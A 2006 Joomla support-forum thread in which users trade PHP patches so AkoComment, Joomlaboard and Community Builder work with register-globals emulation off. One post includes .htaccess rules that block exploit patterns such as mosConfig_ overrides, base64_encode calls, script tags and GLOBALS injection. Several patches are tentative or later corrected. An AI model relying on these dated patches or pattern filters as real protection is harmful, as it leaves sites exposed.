Components not working with Register Globals Emulation off
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
- Websmurf
- Joomla! Hero
- Posts: 2230
- Joined: Fri Aug 19, 2005 2:23 pm
- Location: The Netherlands
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Updated the list again.
Adam van Dongen - Developer
- Blocklist, ODT Indexer, EasyFAQ, Easy Guestbook, Easy Gallery, YaNC & Redirect -
http://www.joomla-addons.org - http://www.bandhosting.nl
- Blocklist, ODT Indexer, EasyFAQ, Easy Guestbook, Easy Gallery, YaNC & Redirect -
http://www.joomla-addons.org - http://www.bandhosting.nl
- mjvvorst
- Joomla! Apprentice
- Posts: 38
- Joined: Sun Sep 18, 2005 9:25 pm
- Location: Netherlands
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Beat,
Thanks very much for your fixes that seem to work very well! Many in the community profit from your efforts.
CB & Joomlaboard work perfectly, but in Akocomment there is still a little glitch: with RG-EMULATION off, comments can no longer be deleted in the backend!
Mark
Thanks very much for your fixes that seem to work very well! Many in the community profit from your efforts.
CB & Joomlaboard work perfectly, but in Akocomment there is still a little glitch: with RG-EMULATION off, comments can no longer be deleted in the backend!
Mark
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
My sentiments exactly Beat. I did confirm the fix to now work on the front-end w/RG emulation off. However, I did not test backend yet, though I'm sure mjvvorst's backend AkoComment problem will be the same as mine (ie. unable to delete AkoComments w/RG emulation off).mjvvorst wrote: Beat,
Thanks very much for your fixes that seem to work very well! Many in the community profit from your efforts.
CB & Joomlaboard work perfectly, but in Akocomment there is still a little glitch: with RG-EMULATION off, comments can no longer be deleted in the backend!
Mark
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
Web Developer & Integrator: http://www.LasVegasExtremes.com
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
In my version of AkoComment the buttons to delete were missing in the code.mjvvorst wrote: Beat,
Thanks very much for your fixes that seem to work very well! Many in the community profit from your efforts.
CB & Joomlaboard work perfectly, but in Akocomment there is still a little glitch: with RG-EMULATION off, comments can no longer be deleted in the backend!
Mark
I added that code, but as it's not GPL, I can't publish it.
I'm adding to my post above the code for making backend work with RG_EMULATION.
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- mjvvorst
- Joomla! Apprentice
- Posts: 38
- Joined: Sun Sep 18, 2005 9:25 pm
- Location: Netherlands
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Beat,
Works like a charm in the backend. Thanks!
At this time of night....do you ever sleep !?
Works like a charm in the backend. Thanks!
At this time of night....do you ever sleep !?
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Aug 21, 2006 3:37 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Hello,
I am using CB 1.0RC2 with SMF Bridge.
It appears that there are some issues in Single-Signon in the SMF bridge if you upgrade CB 1.0RC2 to 1.0.1.
The php register_globals variable is set to ON.
But i have set the RG_EMULATION to 0 in globals.php
Also, in my .htaccess file, i have added the following :
Do you think i am temporarily protected agains any hack via CB 1.0RC2 before i find a solution about the bridge ?
Thanks for your help.
I am using CB 1.0RC2 with SMF Bridge.
It appears that there are some issues in Single-Signon in the SMF bridge if you upgrade CB 1.0RC2 to 1.0.1.
The php register_globals variable is set to ON.
But i have set the RG_EMULATION to 0 in globals.php
Also, in my .htaccess file, i have added the following :
Code: Select all
########## START
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a CONFIG_EXT variable via URL
RewriteCond %{QUERY_STRING} CONFIG_EXT\[LANGUAGES_DIR\](=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
########## End - Rewrite rules to block out some common exploits
Thanks for your help.
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
I tested the same backend AkoComment scenario, both with and without Beat's hotfix,... and his hack makes all the difference, yet again! My RG emulation is off BTWmjvvorst wrote: Beat,
Works like a charm in the backend. Thanks!
At this time of night....do you ever sleep !?
Last edited by tyler on Fri Aug 25, 2006 12:19 am, edited 1 time in total.
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
Web Developer & Integrator: http://www.LasVegasExtremes.com
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Thanks...mjvvorst wrote: Beat,
Works like a charm in the backend. Thanks!
At this time of night....do you ever sleep !?
Working on this
http://dev.joomla.org/index.php?option= ... d=33&p=168
with Rey and others keeps me awake tonight...
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
This .htaccess file should protect you from the most critical vulnerability of RC2. RG_EMULATION 0 doesn't have an influence there, but register_globals OFF (REALLY RECOMMENDED SETTING!) or furl_open OFF would also protect you.fan2 wrote: Hello,
I am using CB 1.0RC2 with SMF Bridge.
...
Do you think i am temporarily protected agains any hack via CB 1.0RC2 before i find a solution about the bridge ?
Thanks for your help.
CB 1.0.1 includes other security fixes as well, so I would still look for a solution to your problem to be able to upgrade in the near future.
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
-
- Joomla! Apprentice
- Posts: 12
- Joined: Thu Aug 18, 2005 7:56 am
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Something I found useful is Team Calendar Pro from www.lewe.com, but to my disappointment this component requires Register Global = on, if not it will not function accordingly.
I had spent much time updating the codes with $_SERVER["PHP_SELF"] for declared $PHP_SELF but still had not got the 2.8.001 version to work productively.
I was wondering someone could look into this interesting component and see if help can be rendered for it.
Thanks in advance.
I had spent much time updating the codes with $_SERVER["PHP_SELF"] for declared $PHP_SELF but still had not got the 2.8.001 version to work productively.
I was wondering someone could look into this interesting component and see if help can be rendered for it.
Thanks in advance.
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Aug 21, 2006 3:37 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Thanks BEAT,Beat wrote:This .htaccess file should protect you from the most critical vulnerability of RC2. RG_EMULATION 0 doesn't have an influence there, but register_globals OFF (REALLY RECOMMENDED SETTING!) or furl_open OFF would also protect you.fan2 wrote: Hello,
I am using CB 1.0RC2 with SMF Bridge.
...
Do you think i am temporarily protected agains any hack via CB 1.0RC2 before i find a solution about the bridge ?
Thanks for your help.
CB 1.0.1 includes other security fixes as well, so I would still look for a solution to your problem to be able to upgrade in the near future.
As soon as i know that there will be no problem when i upgrade CB1.0RC2 to CB1.0.1, i will do it.
About the PHP register_globals, the hoster does not want to modify it.
-
- Joomla! Apprentice
- Posts: 18
- Joined: Tue Apr 04, 2006 8:53 am
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
Hello
i ve problems in joomlaboard with uploading files and pics. (after rg_emulation off)
does it works in yours?
Tom
i ve problems in joomlaboard with uploading files and pics. (after rg_emulation off)
does it works in yours?
Tom
- MarHaj
- Joomla! Ace
- Posts: 1168
- Joined: Fri Jun 30, 2006 5:24 pm
- Location: CZ
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
Provided the first Akocomment BEAT fix concerns akocomment.php and the second admin.akocomment.php I am affraid that for tweaked Artistworks.net version of Akocomment 2.0 they do not work.
But, in the name of those who use non tweaked version: Beat, THANKS!! You saved our sites (and souls)!!!
But, in the name of those who use non tweaked version: Beat, THANKS!! You saved our sites (and souls)!!!
Last edited by MarHaj on Fri Aug 25, 2006 5:29 pm, edited 1 time in total.
MarHaj
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
My free advice: change hoster when you can, that one seems not to understand basic PHP security (or server config) in year 2006.fan2 wrote: ...
About the PHP register_globals, the hoster does not want to modify it.
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
-
- Joomla! Apprentice
- Posts: 8
- Joined: Fri Aug 25, 2006 7:40 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
With RG_EMULATION OFF, the Joomlaboard topic subscription doesn't seem to work as well.
That is, one can't register to a new topic. The request is accepted but the database/status is not getting updated.
If RG_EMULATION is set back to ON, there's no problem.
Is anyone else experiencing the same problem ?
Thanks,
That is, one can't register to a new topic. The request is accepted but the database/status is not getting updated.
If RG_EMULATION is set back to ON, there's no problem.
Is anyone else experiencing the same problem ?
Thanks,
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
I have the exact same issue with being unable to add OR unsubscribe topic subscriptions with RG emulation offkunglao wrote: With RG_EMULATION OFF, the Joomlaboard topic subscription doesn't seem to work as well.
That is, one can't register to a new topic. The request is accepted but the database/status is not getting updated.
If RG_EMULATION is set back to ON, there's no problem.
Is anyone else experiencing the same problem ?
Thanks,
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
Web Developer & Integrator: http://www.LasVegasExtremes.com
-
- Joomla! Apprentice
- Posts: 8
- Joined: Fri Aug 25, 2006 7:40 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
The fix that seems to work for me is to append the following to Beat's fix sequence in joomlaboard.phpkunglao wrote: With RG_EMULATION OFF, the Joomlaboard topic subscription doesn't seem to work as well.
That is, one can't register to a new topic. The request is accepted but the database/status is not getting updated.
If RG_EMULATION is set back to ON, there's no problem.
Code: Select all
if (!isset($sb_thread) && isset($_REQUEST["sb_thread"])) $sb_thread = mosGetParam ( $_REQUEST, 'sb_thread' , '');
if (!isset($thread) && isset($_REQUEST["thread"])) $thread = mosGetParam ( $_REQUEST, 'thread' , '');
Since I'm new to this, I'd appreciate expert members to validate the fix.
Thanks in advance,
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
thx for sharing kunglao, that fix seems to be working for me tookunglao wrote:The fix that seems to work for me is to append the following to Beat's fix sequence in joomlaboard.php
Somehow, #_POST wouldn't work but $_REQUEST does.Code: Select all
if (!isset($sb_thread) && isset($_REQUEST["sb_thread"])) $sb_thread = mosGetParam ( $_REQUEST, 'sb_thread' , ''); if (!isset($thread) && isset($_REQUEST["thread"])) $thread = mosGetParam ( $_REQUEST, 'thread' , '');
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
Web Developer & Integrator: http://www.LasVegasExtremes.com
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
$_REQUEST is just a more general array that contains the contents of the $_POST, $_GET, and $_COOKIE arrays... best used when you aren't sure whether the request will be in Get or Post format... There shouldn't be any problems with its use in that scenario.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
Thanks for proposing fix and also for confirming. Added to the other fixes in my post to group them togetherkunglao wrote:The fix that seems to work for me is to append the following to Beat's fix sequence in joomlaboard.phpkunglao wrote: With RG_EMULATION OFF, the Joomlaboard topic subscription doesn't seem to work as well.
That is, one can't register to a new topic. The request is accepted but the database/status is not getting updated.
If RG_EMULATION is set back to ON, there's no problem.
Somehow, #_POST wouldn't work but $_REQUEST does.Code: Select all
if (!isset($sb_thread) && isset($_REQUEST["sb_thread"])) $sb_thread = mosGetParam ( $_REQUEST, 'sb_thread' , ''); if (!isset($thread) && isset($_REQUEST["thread"])) $thread = mosGetParam ( $_REQUEST, 'thread' , '');
Since I'm new to this, I'd appreciate expert members to validate the fix.
Thanks in advance,
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
the latest JoomlaBoard fixes do not cover the ability to post attachments w/RG off as far as my tests have shown.
When I set RG emulation back to on, the attachment uploads work again.
Can anyone else confirm this on w/the latest JoomlaBoard and RG emulation OFF?
When I set RG emulation back to on, the attachment uploads work again.
Can anyone else confirm this on w/the latest JoomlaBoard and RG emulation OFF?
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
Web Developer & Integrator: http://www.LasVegasExtremes.com
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Confirmed...files + images didn't work + "subscribe me" option on posts/reply.tyler wrote: the latest JoomlaBoard fixes do not cover the ability to post attachments w/RG off as far as my tests have shown.
When I set RG emulation back to on, the attachment uploads work again.
Can anyone else confirm this on w/the latest JoomlaBoard and RG emulation OFF?
Fix below fixes that: add to joomlaboard.php other fixes this:
Code: Select all
if (!isset($subscribeMe) && isset($_POST["subscribeMe"])) $subscribeMe = mosGetParam ( $_POST, 'subscribeMe' , ''); //BBTEMPFIX
if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = mosGetParam ($_FILES['attachimage'], 'name', ''); //BBTEMPFIX
if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = mosGetParam ($_FILES['attachfile'], 'name', ''); //BBTEMPFIX
Can you please confirm the fix fixes all three functions ?
EDIT: changed code above.
Last edited by Beat on Sun Aug 27, 2006 7:02 am, edited 1 time in total.
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- Hackwar
- Joomla! Virtuoso
- Posts: 3788
- Joined: Fri Sep 16, 2005 8:41 pm
- Location: NRW - Germany
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
Hey Beat,
don't forget the fix I send in. You have to add this on line 170 of /administrator/components/com_joomlaboard/admin.joomlaboard.php for viewing user details:
don't forget the fix I send in. You have to add this on line 170 of /administrator/components/com_joomlaboard/admin.joomlaboard.php for viewing user details:
Code: Select all
$uid = mosGetParam( $_REQUEST, 'uid', array(0) );
if (!is_array( $uid )) {
$uid = array(0);
}
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.
Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.
Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
Hmmm, the image and file upload do not work for me when using that fix w/RG emulation off, but the subscribe to thread option does work in that scenario. I even tried a version of those fixes where $_POST is changed to $_REQUEST and I got the same non-working results for img & file uploads. This is w/RG Emulation off. Works fine with RG Emulation off.Beat wrote:Confirmed...files + images didn't work + "subscribe me" option on posts/reply.tyler wrote: the latest JoomlaBoard fixes do not cover the ability to post attachments w/RG off as far as my tests have shown.
When I set RG emulation back to on, the attachment uploads work again.
Can anyone else confirm this on w/the latest JoomlaBoard and RG emulation OFF?
Fix below fixes that: add to joomlaboard.php other fixes this:
Adding to my post http://forum.joomla.org/index.php/topic ... #msg441456Code: Select all
if (!isset($subscribeMe) && isset($_POST["subscribeMe"])) $subscribeMe = mosGetParam ( $_POST, 'subscribeMe' , ''); //BBTEMPFIX if (!isset($attachimage) && isset($_POST["attachimage"])) $attachimage = mosGetParam ( $_POST, 'attachimage' , ''); //BBTEMPFIX if (!isset($attachfile) && isset($_POST["attachfile"])) $attachfile = mosGetParam ( $_POST, 'attachfile' , ''); //BBTEMPFIX
Can you please confirm the fix fixes all three functions ?
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
Web Developer & Integrator: http://www.LasVegasExtremes.com
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
is it possible that maybe the $_FILES var needs to be adjusted for RG? Was looking a little bit in the joomlaboard file_upload.php & image_upload.php and saw $_FILES used there.
not sure what to tinker with it though to make it recognizeable under RG off
and as I mentioned earlier, the subscribe me does work, just not the file or image uploads for me.
not sure what to tinker with it though to make it recognizeable under RG off
and as I mentioned earlier, the subscribe me does work, just not the file or image uploads for me.
Last edited by tyler on Sat Aug 26, 2006 7:49 pm, edited 1 time in total.
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
Web Developer & Integrator: http://www.LasVegasExtremes.com
-
- Joomla! Apprentice
- Posts: 8
- Joined: Fri Aug 25, 2006 7:40 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
I confirm Tyler's problem: "subscribe me" also works for me but not the file/image upload, even with $_REQUEST.tyler wrote:
and as I mentioned earlier, the subscribe me does work, just not the file or image uploads for me.
kunglao
P.S. Thanks to all for your previous feedback.
-
- Joomla! Apprentice
- Posts: 8
- Joined: Fri Aug 25, 2006 7:40 pm
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
To fix the joomlaboard file/image upload, this seems to work for me:
And in this case, given that $attachfile & $attachimage are used just like a flag in the code, can we not bypassing mosGetParam instead
Beat, Rob, or other experts, any reservation on either option ?
Thanks,
KungLao
Code: Select all
if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = mosGetParam ($_FILES['attachimage'], 'name', '');
if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = mosGetParam ($_FILES['attachfile'], 'name', '');
Code: Select all
if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = $_FILES['attachimage']['name'];
if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = $_FILES['attachfile']['name'];
Thanks,
KungLao
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
You should always filter input to your PHP code. The first code example which utilizes mosGetParam is the way you should be doing it... I suggest you apply the same practices to the second code example.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- Beat
- Joomla! Guru
- Posts: 844
- Joined: Thu Aug 18, 2005 8:53 am
- Location: Switzerland
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!
1) Kudos for the find of my stupid mistake in the fix . Actually the culprit using wrongly these variables is post.php ;)kunglao wrote: To fix the joomlaboard file/image upload, this seems to work for me:
And in this case, given that $attachfile & $attachimage are used just like a flag in the code, can we not bypassing mosGetParam insteadCode: Select all
if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = mosGetParam ($_FILES['attachimage'], 'name', ''); if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = mosGetParam ($_FILES['attachfile'], 'name', '');
Beat, Rob, or other experts, any reservation on either option ?Code: Select all
if (!isset($attachimage) && isset($_FILES['attachimage'])) $attachimage = $_FILES['attachimage']['name']; if (!isset($attachfile) && isset($_FILES['attachfile'])) $attachfile = $_FILES['attachfile']['name'];
Thanks,
KungLao
2) Both variants are strictly identical for now, as those variables are arrays, and that mosGetParams does not filter/modify arrays (its expected behavior until now).
3) I have carefully checked the files and image uploads in joomlaBoard from a security point of view using those parameters. The use in post.php is safe, as it's only testing if it's non-null values. I did not find critical vulnerabilities from this point of view (you need to check this when not using mosGetParameters).
Will update my posts above...
Beat
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
www.joomlapolis.com <= Community Builder + CBSubs Joomla membership payment system - team
hosting.joomlapolis.com <= Joomla! Hosting, by the CB Team
- tyler
- Joomla! Intern
- Posts: 71
- Joined: Thu Jan 26, 2006 11:36 pm
- Location: Los Angeles, California, United States
- Contact:
Re: !!! Don't forget to turn off register global emulation of Joomla as well !!!!
How about the following four other variables used respectively in image_upload.php & file_upload.php:
$_FILES['attachimage']['size'] ---> $imageSize
$_FILES['attachimage']['tmp_name']
$_FILES['attachfile']['size'] ---> $fileSize
$_FILES['attachfile']['tmp_name']
Should these need to be accounted for in the same or similar way?
$_FILES['attachimage']['size'] ---> $imageSize
$_FILES['attachimage']['tmp_name']
$_FILES['attachfile']['size'] ---> $fileSize
$_FILES['attachfile']['tmp_name']
Should these need to be accounted for in the same or similar way?
Last edited by tyler on Sun Aug 27, 2006 7:21 am, edited 1 time in total.
-Tyler D.
Web Developer & Integrator: http://www.LasVegasExtremes.com
Web Developer & Integrator: http://www.LasVegasExtremes.com